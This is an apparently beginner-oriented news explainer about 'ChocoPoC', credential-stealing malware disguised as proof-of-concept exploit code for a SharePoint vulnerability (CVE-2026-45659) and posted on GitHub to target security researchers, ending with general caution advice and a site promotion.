Attackers distribute password-stealing malware disguised as legitimate bug-testing code for SharePoint vulnerability.
Security researchers hunting for software bugs have become targets themselves. A newly discovered threat called ChocoPoC disguises dangerous malware as legitimate testing code designed to demonstrate flaws in Microsoft SharePoint, a widely-used business collaboration platform. The malicious files are posted on GitHub, the popular code-sharing website where developers worldwide share and collaborate on projects.
When someone runs this fake testing code thinking they're working with legitimate security research, the malware silently steals passwords and other sensitive login credentials stored on their computer. It operates invisibly, leaving no obvious signs of infection. The vulnerability being exploited—tracked as CVE-2026-45659—allows attackers to run unauthorized code directly on SharePoint systems, making it particularly dangerous for organizations relying on this software.
Government cybersecurity officials have formally recognized this threat's severity by adding CVE-2026-45659 to their official watch list of exploited vulnerabilities.
This attack is clever because it exploits trust. Security researchers and IT professionals intentionally search for and test software vulnerabilities—it's their job to find problems before criminals do. By poisoning the very tools they use to conduct this defensive work, attackers gain access to skilled professionals who likely have elevated access to important systems.
Think of it like compromising a locksmith's tools to steal from the homes they're trying to protect. The attacker gains entry through someone with legitimate access and expertise.
If you work with SharePoint or participate in security research, you face direct risk. Downloaded exploit code from untrusted sources could compromise your personal passwords, email accounts, and corporate credentials. For organizations, this represents a supply-chain threat—attackers are weaponizing the defensive tools your security team depends on.
Even if you don't personally develop or test code, your company's security could be affected if your IT team unknowingly runs contaminated testing tools.
This incident demonstrates that cybersecurity professionals need the same protection and caution as everyone else—stay skeptical of code sources, keep systems patched, and assume threats can arrive from unexpected directions.
Want to understand the technology behind this story? ITVedas has beginner-friendly guides on every IT topic.
Explore IT Chapters →